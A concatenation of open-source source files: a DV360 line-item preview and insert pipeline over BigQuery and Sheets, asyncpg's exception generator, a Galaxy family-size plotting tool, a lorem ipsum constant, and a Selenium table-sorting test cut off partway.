CM_PG.pricingSchedule.endDate AS budgetSegmentEndDate,
NULLIF(CAST(CM_PP.rateOrCostNanos / 1000000000 AS INT64), 0) AS bidAmount,
CM_PG.name AS ioDisplayName,
CM_P.name AS liDisplayName
FROM `{dataset}.CM_PlacementGroups` AS CM_PG, UNNEST(childPlacementIds) AS childPlacementId, UNNEST(CM_PG.pricingSchedule.pricingPeriods) AS CM_PP
JOIN `{dataset}.CM_Placements` CM_P
ON childPlacementId = CM_P.id
JOIN `{dataset}.CM_Campaigns` AS CM_C
ON CM_P.campaignId = CM_C.id
JOIN `{dataset}.CM_Sites` AS CM_S
ON CM_PG.siteId = CM_S.id AND CM_S.name = 'Google DBM'
WHERE
pg_ProductCode IS NOT NULL
AND p_ProductCode IS NOT NULL
),
sheet AS (
SELECT
CONCAT(dv_a.displayName, ' - ', dv_a.advertiserid) AS DV_Advertiser,
sheet.*
FROM `{dataset}.SHEET_LI_Rules` as sheet
LEFT JOIN `{dataset}.DV_Campaigns` AS dv_c
ON CAST(REGEXP_EXTRACT(sheet.DV_Campaign, r' - (\d+)$') AS INT64) = dv_c.campaignId
LEFT JOIN `{dataset}.DV_Advertisers` AS dv_a
ON dv_a.advertiserid=dv_c.advertiserId
),
li_flattened AS (
SELECT
lineItemId,
displayName,
MAX(postViewLookbackWindowDays) AS postViewLookbackWindowDays,
MAX(postClickLookbackWindowDays) AS postClickLookbackWindowDays,
ARRAY_TO_STRING(ARRAY_AGG(CAST(floodlightActivityConfig.floodlightActivityId AS STRING) IGNORE NULLS), ",") AS floodlightActivityIds,
ARRAY_TO_STRING(ARRAY_AGG(CAST(inventorySourceId AS STRING) IGNORE NULLS), ",") AS inventorySourceIds
FROM `{dataset}.DV_LineItems`
LEFT JOIN UNNEST(conversionCounting.floodlightActivityConfigs) AS floodlightActivityConfig
LEFT JOIN UNNEST(inventorySourceIds) AS inventorySourceId
GROUP BY 1,2
),
io_flattened AS (
SELECT
insertionOrderId,
displayName,
MIN(DATE(segments.dateRange.startDate.year, segments.dateRange.startDate.month, segments.dateRange.startDate.day)) AS budgetSegmentStartDate,
MAX(DATE(segments.dateRange.endDate.year, segments.dateRange.endDate.month, segments.dateRange.endDate.day)) AS budgetSegmentEndtDate,
FROM `{dataset}.DV_InsertionOrders`
LEFT JOIN UNNEST(budget.budgetSegments) AS segments
GROUP BY 1,2
)
SELECT
'PREVIEW' AS action,
sheet.DV_Advertiser,
sheet.DV_Campaign,
CONCAT(dv_io.displayName, ' - ', dv_io.insertionOrderId) as DV_InsertionOrder,
cm.liDisplayName AS displayName,
sheet.Type AS lineItemType,
'ENTITY_STATUS_DRAFT' AS entityStatus,
CAST(NULL AS INT64) AS bidAmount,
dv_io.budgetSegmentStartDate,
dv_io.budgetSegmentEndtDate,
sheet.Budget_Allocation AS lineItemBudgetAllocationType,
sheet.Pacing_Period AS pacingPeriod,
sheet.Pacing_Type AS pacingType,
sheet.Pacing_Period_Max_Spend AS dailyMaxMicros,
sheet.Pacing_Period_Max_Impressions AS dailyMaxImpressions,
sheet.Frequency_Cap_Unlimited AS frequencyCapUnlimited,
sheet.Frequency_Cap_Time_Unit AS frequencyCapTimeUnit,
sheet.Frequency_Cap_Time_Unit_Count AS frequencyCapTimeUnitCount,
sheet.Frequency_Cap_Max_Impressions AS frequencyCapMaxImpressions,
sheet.Post_View_Count_Percent AS postViewCountPercentageMillis,
90 AS postViewLookbackWindowDays,
90 AS postClickLookbackWindowDays,
sheet.Performance_Goal_Type AS biddingStrategyPerformanceGoalType,
sheet.Performance_Goal_Amount AS performanceGoalAmountMicros,
sheet.Max_Average_CPM_Amount AS maxAverageCpmBidAmountMicros,
sheet.Custom_Bidding_Algorithm,
dv_li.floodlightActivityIds,
dv_li.inventorySourceIds,
CAST(NULL AS STRING) AS Partner_Cost_CPM_Fee_Cost_Type,
CAST(NULL AS STRING) AS Partner_Cost_CPM_Fee_Invoice_Type,
CAST(NULL AS STRING) AS Partner_Cost_CPM_Fee_Amount,
CAST(NULL AS STRING) AS Partner_Cost_Media_Fee_Cost_Type,
CAST(NULL AS STRING) AS Partner_Cost_Media_Fee_Invoice_Type,
CAST(NULL AS STRING) AS Partner_Cost_Media_Fee_Percent
FROM sheet
LEFT JOIN cm
ON CAST(REGEXP_EXTRACT(sheet.CM_Campaign, r' - (\d+)$') AS INT64) = cm.campaignId
AND (
(SPLIT(cm.name,'_')[OFFSET(0)] = 'VID' AND LOWER(SPLIT(sheet.Type , '_')[SAFE_OFFSET(3)]) = 'video')
OR (NOT SPLIT(cm.name, '_')[OFFSET(0)] = 'VID' AND LOWER(SPLIT(sheet.Type, '_')[SAFE_OFFSET(3)]) = 'display')
)
LEFT JOIN io_flattened dv_io
ON dv_io.displayName = cm.ioDisplayName
LEFT JOIN li_flattened dv_li
ON dv_li.displayName = cm.liDisplayName
""".format(**task),
legacy=False
)
# create audit view
query_to_view(
task["auth_bigquery"],
config.project,
task["dataset"],
"AUDIT_LI",
"""WITH
/* Check if sheet values are set */
INPUT_ERRORS AS (
SELECT
'LI Rules' AS Operation,
'Missing Sheet input value.' AS Error,
'ERROR' AS Severity,
CAST(NULL AS STRING) AS DV_Advertiser,
DV_Campaign,
CAST(NULL AS STRING) AS DV_InsertionOrder,
CM_Campaign AS DV_LineItem
FROM `{dataset}.SHEET_LI_Rules`
WHERE
CM_Campaign IS NULL
OR DV_Campaign IS NULL
OR Type IS NULL
OR Budget_Allocation IS NULL
OR Pacing_Period IS NULL
OR Pacing_Type IS NULL
OR Pacing_Period_Max_Spend IS NULL
OR Pacing_Period_Max_Impressions IS NULL
OR Frequency_Cap_Unlimited IS NULL
OR Frequency_Cap_Time_Unit IS NULL
OR Frequency_Cap_Time_Unit_Count IS NULL
OR Frequency_Cap_Max_Impressions IS NULL
OR Post_View_Count_Percent IS NULL
OR Performance_Goal_Type IS NULL
OR Performance_Goal_Amount IS NULL
OR Max_Average_CPM_Amount IS NULL
OR Custom_Bidding_Algorithm IS NULL
),
/* Check if duplicate LI */
DUPLICATE_ERRORS AS (
SELECT
'LI Rules' AS Operation,
'Duplicate Line Item.' AS Error,
'WARNING' AS Severity,
DV_Advertiser,
DV_Campaign,
DV_InsertionOrder,
DV_R.displayName AS DV_LineItem
FROM
`{dataset}.PREVIEW_LI` AS DV_R
LEFT JOIN (
SELECT
advertiserId,
campaignId,
insertionOrderId,
displayName
FROM `{dataset}.DV_LineItems`
GROUP BY 1,2,3,4
) AS DV_LI
ON DV_R.displayName = DV_LI.displayName
AND CAST(REGEXP_EXTRACT(DV_R.DV_Campaign, r' - (\d+)$') AS INT64) = DV_LI.campaignId
AND CAST(REGEXP_EXTRACT(DV_R.DV_InsertionOrder, r' - (\d+)$') AS INT64) = DV_LI.insertionOrderId
)
SELECT * FROM INPUT_ERRORS
UNION ALL
SELECT * FROM DUPLICATE_ERRORS
""".format(**task),
legacy=False
)
# write io preview to sheet
put_rows(
task['auth_sheets'],
{ 'sheets': {
'sheet': task['sheet'],
'tab': 'LI Preview',
'header':False,
'range': 'A2'
}},
get_rows(
task['auth_bigquery'],
{ 'bigquery': {
'dataset': task['dataset'],
'query': """SELECT
A.Severity,
A.Error,
P.*
FROM `{dataset}.PREVIEW_LI` AS P
LEFT JOIN (
SELECT
DV_Advertiser,
DV_Campaign,
DV_InsertionOrder,
DV_LineItem,
CASE
WHEN 'ERROR' IN UNNEST(ARRAY_AGG(Severity)) THEN 'ERROR'
WHEN 'WARNING' IN UNNEST(ARRAY_AGG(Severity)) THEN 'WARNING'
ELSE 'OK'
END AS Severity,
ARRAY_TO_STRING(ARRAY_AGG(CONCAT(Severity, ': ', Error)), '\\n') AS Error,
FROM `{dataset}.AUDIT_LI`
GROUP BY 1,2,3,4
) AS A
ON P.DV_Advertiser=A.DV_Advertiser
AND P.DV_Campaign=A.DV_Campaign
AND P.DV_InsertionOrder=A.DV_InsertionOrder
AND P.displayName=A.DV_LineItem
""".format(**task),
}}
)
)
def preview_li_insert(config, task):
# download IO Inserts
put_rows(
task["auth_bigquery"],
{ "bigquery": {
"dataset": task["dataset"],
"table": "SHEET_LI_Inserts",
"schema": [
{ "name": "status", "type": "STRING", "mode": "NULLABLE" },
{ "name": "error", "type": "STRING", "mode": "NULLABLE" },
{ "name": "action", "type": "STRING", "mode": "NULLABLE" },
{ "name": "advertiser", "type": "STRING", "mode": "NULLABLE" },
{ "name": "campaign", "type": "STRING", "mode": "NULLABLE" },
{ "name": "insertionOrder", "type": "STRING", "mode": "NULLABLE" },
{ "name": "displayName", "type": "STRING", "mode": "NULLABLE" },
{ "name": "lineItemType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "entityStatus", "type": "STRING", "mode": "NULLABLE" },
{ "name": "bidAmount", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "budgetSegmentStartDate", "type": "DATE", "mode": "NULLABLE" },
{ "name": "budgetSegmentEndDate", "type": "DATE", "mode": "NULLABLE" },
{ "name": "lineItemBudgetAllocationType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "pacingPeriod", "type": "STRING", "mode": "NULLABLE" },
{ "name": "pacingType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "dailyMaxMicros", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "dailyMaxImpressions", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "frequencyCapUnlimited", "type": "BOOLEAN", "mode": "NULLABLE" },
{ "name": "frequencyCapTimeUnit", "type": "STRING", "mode": "NULLABLE" },
{ "name": "frequencyCapTimeUnitCount", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "frequencyCapMaxImpressions", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "postViewCountPercentageMillis", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "postViewLookbackWindowDays", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "postClickLookbackWindowDays", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "biddingStrategyPerformanceGoalType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "performanceGoalAmountMicros", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "maxAverageCpmBidAmountMicros", "type": "INTEGER", "mode": "NULLABLE" },
{ "name": "customBiddingAlgorithm", "type": "STRING", "mode": "NULLABLE" },
{ "name": "floodlightActivityIds", "type": "STRING", "mode": "NULLABLE" },
{ "name": "inventorySourceIds", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerCPMFeeCostType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerCPMFeeInvoiceType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerCPMFeeAmount", "type": "FLOAT", "mode": "NULLABLE" },
{ "name": "partnerMediaFeeCostType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerMediaFeeInvoiceType", "type": "STRING", "mode": "NULLABLE" },
{ "name": "partnerMediaFeePercent", "type": "FLOAT", "mode": "NULLABLE" },
],
"format": "CSV"
}},
get_rows(
task["auth_sheets"],
{ "sheets": {
"sheet": task["sheet"],
"tab": "LI Preview",
"header":False,
"range": "A2:AJ"
}}
)
)
# create insert view
query_to_view(
task["auth_bigquery"],
config.project,
task["dataset"],
"INSERT_LI",
"""
SELECT
REGEXP_EXTRACT(advertiser, r' - (\d+)$') AS advertiserId,
STRUCT(
REGEXP_EXTRACT(advertiser, r' - (\d+)$') AS advertiserId,
REGEXP_EXTRACT(campaign, r' - (\d+)$') AS campaignId,
REGEXP_EXTRACT(insertionOrder, r' - (\d+)$') AS insertionOrderId,
displayName,
lineItemType,
entityStatus,
ARRAY((
SELECT partnerCost FROM (
SELECT
IF(partnerCPMFeeAmount IS NOT NULL,
STRUCT(
'PARTNER_COST_FEE_TYPE_CPM_FEE' AS feeType,
partnerCPMFeeCostType AS costType,
partnerCPMFeeInvoiceType AS invoiceType,
COALESCE(partnerCPMFeeAmount, 0) * 1000000 AS feeAmount
), NULL) AS partnerCost
UNION ALL
SELECT
IF(partnerMediaFeePercent IS NOT NULL,
STRUCT(
'PARTNER_COST_FEE_TYPE_MEDIA_FEE' AS feeType,
partnerMediaFeeCostType AS costType,
partnerMediaFeeInvoiceType AS invoiceType,
COALESCE(partnerMediaFeePercent, 0) * 1000 AS feePercentageMillis
), NULL) AS partnerCost
) WHERE partnerCost IS NOT NULL)
) AS partnerCosts,
STRUCT( 'LINE_ITEM_FLIGHT_DATE_TYPE_INHERITED' AS flightDateType ) AS flight,
STRUCT ( lineItemBudgetAllocationType AS budgetAllocationType ) AS budget,
STRUCT (
pacingPeriod,
pacingType,
IF(dailyMaxMicros IS NOT NULL, dailyMaxMicros * 1000000, NULL) AS dailyMaxMicros,
IF(dailyMaxMicros IS NULL, dailyMaxImpressions, NULL) AS dailyMaxImpressions
) AS pacing,
STRUCT ( CAST(frequencyCapUnlimited AS BOOL) AS unlimited,
frequencyCapTimeUnit AS timeUnit,
CAST(frequencyCapTimeUnitCount AS INT64) AS timeUnitCount,
CAST(frequencyCapMaxImpressions AS INT64) AS maxImpressions
) AS frequencyCap,
STRUCT ( 'PARTNER_REVENUE_MODEL_MARKUP_TYPE_TOTAL_MEDIA_COST_MARKUP' AS markupType ) AS partnerRevenueModel,
STRUCT ( STRUCT ( CAST(bidAmount * 1000000 AS INT64) AS bidAmountMicros ) AS fixedBid ) AS bidStrategy,
STRUCT(
postViewCountPercentageMillis AS postViewCountPercentageMillis,
ARRAY(
SELECT
STRUCT(
floodlightActivityId,
postClickLookbackWindowDays,
postViewLookbackWindowDays
)
FROM UNNEST(SPLIT(floodlightActivityIds)) AS floodlightActivityId
) AS floodlightActivityConfigs
) AS conversionCounting
) AS body
FROM `{dataset}.SHEET_LI_Inserts`
WHERE action = 'INSERT'
""".format(**task),
legacy=False
)
# write LIs to API
for row in get_rows(
task["auth_bigquery"],
{ "bigquery": {
"dataset": task["dataset"],
"table":"INSERT_LI",
}},
as_object=True
):
try:
response = API_DV360(task['auth_dv']).advertisers().lineItems().create(**row).execute()
log_write('LI', row, response['lineItemId'], None)
except Exception as e:
log_write('LI', row, None, str(e))
log_write(config)
|
tools/generate_exceptions.py
|
baltitenger/asyncpg
| 5,714 |
88074
|
#!/usr/bin/env python3
#
# Copyright (C) 2016-present the asyncpg authors and contributors
# <see AUTHORS file>
#
# This module is part of asyncpg and is released under
# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0
import argparse
import builtins
import re
import string
import textwrap
from asyncpg.exceptions import _base as apg_exc
_namemap = {
'08001': 'ClientCannotConnectError',
'08004': 'ConnectionRejectionError',
'08006': 'ConnectionFailureError',
'38002': 'ModifyingExternalRoutineSQLDataNotPermittedError',
'38003': 'ProhibitedExternalRoutineSQLStatementAttemptedError',
'38004': 'ReadingExternalRoutineSQLDataNotPermittedError',
'39004': 'NullValueInExternalRoutineNotAllowedError',
'42000': 'SyntaxOrAccessError',
'XX000': 'InternalServerError',
}
_subclassmap = {
# Special subclass of FeatureNotSupportedError
# raised by Postgres in RevalidateCachedQuery.
'0A000': ['InvalidCachedStatementError']
}
def _get_error_name(sqlstatename, msgtype, sqlstate):
if sqlstate in _namemap:
return _namemap[sqlstate]
parts = string.capwords(sqlstatename.replace('_', ' ')).split(' ')
if parts[-1] in {'Exception', 'Failure'}:
parts[-1] = 'Error'
if parts[-1] != 'Error' and msgtype != 'W':
parts.append('Error')
for i, part in enumerate(parts):
if part == 'Fdw':
parts[i] = 'FDW'
elif part == 'Io':
parts[i] = 'IO'
elif part == 'Plpgsql':
parts[i] = 'PLPGSQL'
elif part == 'Sql':
parts[i] = 'SQL'
errname = ''.join(parts)
if hasattr(builtins, errname):
errname = 'Postgres' + errname
return errname
def main():
parser = argparse.ArgumentParser(
description='generate _exceptions.py from postgres/errcodes.txt')
parser.add_argument('errcodesfile', type=str,
help='path to errcodes.txt in PostgreSQL source')
args = parser.parse_args()
with open(args.errcodesfile, 'r') as errcodes_f:
errcodes = errcodes_f.read()
section_re = re.compile(r'^Section: .*')
tpl = """\
class {clsname}({base}):
{docstring}{sqlstate}"""
new_section = True
section_class = None
buf = '# GENERATED FROM postgresql/src/backend/utils/errcodes.txt\n' + \
'# DO NOT MODIFY, use tools/generate_exceptions.py to update\n\n' + \
'from ._base import * # NOQA\nfrom . import _base\n\n\n'
classes = []
clsnames = set()
def _add_class(clsname, base, sqlstate, docstring):
if sqlstate:
sqlstate = "sqlstate = '{}'".format(sqlstate)
else:
sqlstate = ''
txt = tpl.format(clsname=clsname, base=base, sqlstate=sqlstate,
docstring=docstring)
if not sqlstate and not docstring:
txt += 'pass'
if len(txt.splitlines()[0]) > 79:
txt = txt.replace('(', '(\n ', 1)
classes.append(txt)
clsnames.add(clsname)
for line in errcodes.splitlines():
if not line.strip() or line.startswith('#'):
continue
if section_re.match(line):
new_section = True
continue
parts = re.split(r'\s+', line)
if len(parts) < 4:
continue
sqlstate = parts[0]
msgtype = parts[1]
name = parts[3]
clsname = _get_error_name(name, msgtype, sqlstate)
if clsname in {'SuccessfulCompletionError'}:
continue
if clsname in clsnames:
raise ValueError(
'duplicate exception class name: {}'.format(clsname))
if new_section:
section_class = clsname
if clsname == 'PostgresWarning':
base = '_base.PostgresLogMessage, Warning'
else:
if msgtype == 'W':
base = 'PostgresWarning'
else:
base = '_base.PostgresError'
new_section = False
else:
base = section_class
existing = apg_exc.PostgresMessageMeta.get_message_class_for_sqlstate(
sqlstate)
if (existing and existing is not apg_exc.UnknownPostgresError and
existing.__doc__):
docstring = '"""{}"""\n\n '.format(existing.__doc__)
else:
docstring = ''
_add_class(clsname=clsname, base=base, sqlstate=sqlstate,
docstring=docstring)
subclasses = _subclassmap.get(sqlstate, [])
for subclass in subclasses:
existing = getattr(apg_exc, subclass, None)
if existing and existing.__doc__:
docstring = '"""{}"""\n\n '.format(existing.__doc__)
else:
docstring = ''
_add_class(clsname=subclass, base=clsname, sqlstate=None,
docstring=docstring)
buf += '\n\n\n'.join(classes)
_all = textwrap.wrap(', '.join('{!r}'.format(c) for c in sorted(clsnames)))
buf += '\n\n\n__all__ = (\n {}\n)'.format(
'\n '.join(_all))
buf += '\n\n__all__ += _base.__all__'
print(buf)
if __name__ == '__main__':
main()
|
tools/fsd/fsd_regions.py
|
ErasmusMC-Bioinformatics/tools-iuc
| 142 |
88078
|
#!/usr/bin/env python
# Family size distribution of tags which were aligned to the reference genome
#
# Author: <NAME> & <NAME>, Johannes-Kepler University Linz (Austria)
# Contact: <EMAIL>
#
# Takes at least one TABULAR file with tags before the alignment to the SSCS,
# a BAM file with tags of reads that overlap the regions of the reference genome and
# an optional BED file with chromosome, start and stop position of the regions as input.
# The program produces a plot which shows the distribution of family sizes of the tags from the input files and
# a tabular file with the data of the plot.
# USAGE: python FSD_regions.py --inputFile filenameSSCS --inputName1 filenameSSCS
# --bamFile DCSbamFile --rangesFile BEDfile --output_tabular outptufile_name_tabular
# --output_pdf outputfile_name_pdf
import argparse
import collections
import os.path
import re
import sys
import matplotlib.pyplot as plt
import numpy as np
import pysam
from matplotlib.backends.backend_pdf import PdfPages
plt.switch_backend('agg')
def readFileReferenceFree(file, delim):
with open(file, 'r') as dest_f:
data_array = np.genfromtxt(dest_f, skip_header=0, delimiter=delim, comments='#', dtype=str)
return data_array
def make_argparser():
parser = argparse.ArgumentParser(description='Family Size Distribution of tags which were aligned to regions of the reference genome')
parser.add_argument('--inputFile', help='Tabular File with three columns: ab or ba, tag and family size.')
parser.add_argument('--inputName1')
parser.add_argument('--bamFile', help='BAM file with aligned reads.')
parser.add_argument('--rangesFile', default=None, help='BED file with chromosome, start and stop positions.')
parser.add_argument('--output_pdf', default="data.pdf", type=str, help='Name of the pdf and tabular file.')
parser.add_argument('--output_tabular', default="data.tabular", type=str, help='Name of the pdf and tabular file.')
return parser
def compare_read_families_refGenome(argv):
parser = make_argparser()
args = parser.parse_args(argv[1:])
firstFile = args.inputFile
name1 = args.inputName1
name1 = name1.split(".tabular")[0]
bamFile = args.bamFile
rangesFile = args.rangesFile
title_file = args.output_pdf
title_file2 = args.output_tabular
sep = "\t"
with open(title_file2, "w") as output_file, PdfPages(title_file) as pdf:
data_array = readFileReferenceFree(firstFile, "\t")
bamIndex = f"{bamFile}.bai"
if not os.path.exists(bamIndex):
print(f"Info: Generating BAM index in {bamIndex}")
pysam.index(bamFile)
bam = pysam.AlignmentFile(bamFile, "rb")
qname_dict = collections.OrderedDict()
if rangesFile is not None:
with open(rangesFile, 'r') as regs:
range_array = np.genfromtxt(regs, skip_header=0, delimiter='\t', comments='#', dtype=str)
if range_array.ndim == 0:
print("Error: file has 0 lines")
exit(2)
if range_array.ndim == 1:
chrList = range_array[0]
start_posList = range_array[1].astype(int)
stop_posList = range_array[2].astype(int)
chrList = [chrList.tolist()]
start_posList = [start_posList.tolist()]
stop_posList = [stop_posList.tolist()]
else:
chrList = range_array[:, 0]
start_posList = range_array[:, 1].astype(int)
stop_posList = range_array[:, 2].astype(int)
if len(start_posList) != len(stop_posList):
print("start_positions and end_positions do not have the same length")
exit(3)
chrList = np.array(chrList)
start_posList = np.array(start_posList).astype(int)
stop_posList = np.array(stop_posList).astype(int)
for chr, start_pos, stop_pos in zip(chrList, start_posList, stop_posList):
chr_start_stop = "{}_{}_{}".format(chr, start_pos, stop_pos)
qname_dict[chr_start_stop] = []
for read in bam.fetch(chr, start_pos, stop_pos):
if not read.is_unmapped:
if re.search('_', read.query_name):
tags = re.split('_', read.query_name)[0]
else:
tags = read.query_name
qname_dict[chr_start_stop].append(tags)
else:
for read in bam.fetch():
if not read.is_unmapped:
if re.search(r'_', read.query_name):
tags = re.split('_', read.query_name)[0]
else:
tags = read.query_name
if read.reference_name not in qname_dict:
qname_dict[read.reference_name] = [tags]
else:
qname_dict[read.reference_name].append(tags)
seq = np.array(data_array[:, 1])
tags = np.array(data_array[:, 2])
quant = np.array(data_array[:, 0]).astype(int)
group = np.array(list(qname_dict.keys()))
all_ab = seq[np.where(tags == "ab")[0]]
all_ba = seq[np.where(tags == "ba")[0]]
quant_ab = quant[np.where(tags == "ab")[0]]
quant_ba = quant[np.where(tags == "ba")[0]]
seqDic_ab = dict(zip(all_ab, quant_ab))
seqDic_ba = dict(zip(all_ba, quant_ba))
lst_ab = []
lst_ba = []
quantAfterRegion = []
length_regions = 0
for i in group:
lst_ab_r = []
lst_ba_r = []
seq_mut = qname_dict[i]
if rangesFile is None:
seq_mut, seqMut_index = np.unique(np.array(seq_mut), return_index=True)
length_regions = length_regions + len(seq_mut) * 2
for r in seq_mut:
count_ab = seqDic_ab.get(r)
count_ba = seqDic_ba.get(r)
lst_ab_r.append(count_ab)
lst_ab.append(count_ab)
lst_ba_r.append(count_ba)
lst_ba.append(count_ba)
dataAB = np.array(lst_ab_r)
dataBA = np.array(lst_ba_r)
bigFamilies = np.where(dataAB > 20)[0]
dataAB[bigFamilies] = 22
bigFamilies = np.where(dataBA > 20)[0]
dataBA[bigFamilies] = 22
quantAll = np.concatenate((dataAB, dataBA))
quantAfterRegion.append(quantAll)
quant_ab = np.array(lst_ab)
quant_ba = np.array(lst_ba)
maximumX = np.amax(np.concatenate(quantAfterRegion))
minimumX = np.amin(np.concatenate(quantAfterRegion))
# PLOT
plt.rc('figure', figsize=(11.69, 8.27)) # A4 format
plt.rcParams['axes.facecolor'] = "E0E0E0" # grey background color
plt.rcParams['xtick.labelsize'] = 14
plt.rcParams['ytick.labelsize'] = 14
plt.rcParams['patch.edgecolor'] = "black"
fig = plt.figure()
plt.subplots_adjust(bottom=0.3)
colors = ["#6E6E6E", "#0431B4", "#5FB404", "#B40431", "#F4FA58", "#DF7401", "#81DAF5"]
col = []
for i in range(0, len(group)):
col.append(colors[i])
counts = plt.hist(quantAfterRegion, bins=range(minimumX, maximumX + 1), stacked=False, label=group,
align="left", alpha=1, color=col, edgecolor="black", linewidth=1)
ticks = np.arange(minimumX - 1, maximumX, 1)
ticks1 = [str(_) for _ in ticks]
ticks1[len(ticks1) - 1] = ">20"
plt.xticks(np.array(ticks), ticks1)
count = np.bincount([int(_) for _ in quant_ab]) # original counts
legend = "max. family size:\nabsolute frequency:\nrelative frequency:\n\ntotal nr. of reads:\n(before SSCS building)"
plt.text(0.15, 0.085, legend, size=11, transform=plt.gcf().transFigure)
legend = "AB\n{}\n{}\n{:.5f}\n\n{:,}".format(max(map(int, quant_ab)), count[len(count) - 1], float(count[len(count) - 1]) / sum(count), sum(np.array(data_array[:, 0]).astype(int)))
plt.text(0.35, 0.105, legend, size=11, transform=plt.gcf().transFigure)
count2 = np.bincount([int(_) for _ in quant_ba]) # original counts
legend = "BA\n{}\n{}\n{:.5f}" \
.format(max(map(int, quant_ba)), count2[len(count2) - 1], float(count2[len(count2) - 1]) / sum(count2))
plt.text(0.45, 0.1475, legend, size=11, transform=plt.gcf().transFigure)
plt.text(0.55, 0.2125, "total nr. of tags:", size=11, transform=plt.gcf().transFigure)
plt.text(0.8, 0.2125, "{:,} ({:,})".format(length_regions, length_regions / 2), size=11,
transform=plt.gcf().transFigure)
legend4 = "* In the plot, both family sizes of the ab and ba strands were used.\nWhereas the total numbers indicate only the single count of the tags per region.\n"
plt.text(0.1, 0.01, legend4, size=11, transform=plt.gcf().transFigure)
space = 0
for i, count in zip(group, quantAfterRegion):
plt.text(0.55, 0.15 - space, "{}:\n".format(i), size=11, transform=plt.gcf().transFigure)
plt.text(0.8, 0.15 - space, "{:,}\n".format(len(count) / 2), size=11, transform=plt.gcf().transFigure)
space = space + 0.02
plt.legend(loc='upper right', fontsize=14, bbox_to_anchor=(0.9, 1), frameon=True)
plt.xlabel("Family size", fontsize=14)
plt.ylabel("Absolute Frequency", fontsize=14)
plt.grid(b=True, which="major", color="#424242", linestyle=":")
plt.margins(0.01, None)
pdf.savefig(fig, bbox_inch="tight")
plt.close()
output_file.write("Dataset:{}{}\n".format(sep, name1))
output_file.write("{}AB{}BA\n".format(sep, sep))
output_file.write("max. family size:{}{}{}{}\n".format(sep, max(map(int, quant_ab)), sep, max(map(int, quant_ba))))
output_file.write("absolute frequency:{}{}{}{}\n".format(sep, count[len(count) - 1], sep, count2[len(count2) - 1]))
output_file.write("relative frequency:{}{:.3f}{}{:.3f}\n\n".format(sep, float(count[len(count) - 1]) / sum(count), sep, float(count2[len(count2) - 1]) / sum(count2)))
output_file.write("total nr. of reads{}{}\n".format(sep, sum(np.array(data_array[:, 0]).astype(int))))
output_file.write("total nr. of tags{}{} ({})\n".format(sep, length_regions, length_regions / 2))
output_file.write("\n\nValues from family size distribution\n")
output_file.write("{}".format(sep))
for i in group:
output_file.write("{}{}".format(i, sep))
output_file.write("\n")
j = 0
for fs in counts[1][0:len(counts[1]) - 1]:
if fs == 21:
fs = ">20"
else:
fs = "={}".format(fs)
output_file.write("FS{}{}".format(fs, sep))
if len(group) == 1:
output_file.write("{}{}".format(int(counts[0][j]), sep))
else:
for n in range(len(group)):
output_file.write("{}{}".format(int(counts[0][n][j]), sep))
output_file.write("\n")
j += 1
output_file.write("sum{}".format(sep))
if len(group) == 1:
output_file.write("{}{}".format(int(sum(counts[0])), sep))
else:
for i in counts[0]:
output_file.write("{}{}".format(int(sum(i)), sep))
output_file.write("\n")
output_file.write("\n\nIn the plot, both family sizes of the ab and ba strands were used.\nWhereas the total numbers indicate only the single count of the tags per region.\n")
output_file.write("Region{}total nr. of tags per region\n".format(sep))
for i, count in zip(group, quantAfterRegion):
output_file.write("{}{}{}\n".format(i, sep, len(count) / 2))
print("Files successfully created!")
if __name__ == '__main__':
sys.exit(compare_read_families_refGenome(sys.argv))
|
itests/lorem.py
|
skivis/BlackSheep
| 482 |
88081
|
<filename>itests/lorem.py
LOREM_IPSUM = """
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna
aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint
occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Sed ut perspiciatis
unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab
illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia
voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi
nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non
numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam,
quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem
vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum
fugiat quo voluptas nulla pariatur?
"""
|
25-tables/python/tables.py
|
tourdedave/selenium-tips
| 251 |
88086
|
<filename>25-tables/python/tables.py
# -*- coding: utf-8 -*-
"""
Implementation of http://elementalselenium.com/tips/25-tables
"""
import unittest
from selenium import webdriver
class Tables(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
def tearDown(self):
self.driver.quit()
def test_sort_number_column_in_ascending_order_with_limited_locators(self):
driver = self.driver
driver.get('http://the-internet.herokuapp.com/tables')
driver.find_element_by_css_selector('#table1 thead tr th:nth-of-type(4)').click()
due_column = driver.find_elements_by_css_selector('#table1 tbody tr td:nth-of-type(4)')
dues = [float(due.text.replace('$','')) for due in due_column]
assert dues == sorted(dues)
def test_sort_number_column_in_descending_order_with_limited_locators(self):
driver = self.driver
driver.get('http://the-internet.herokuapp.com/tables')
driver.find_element_by_css_selector('#table1 thead tr th:nth-of-type(4)').click()
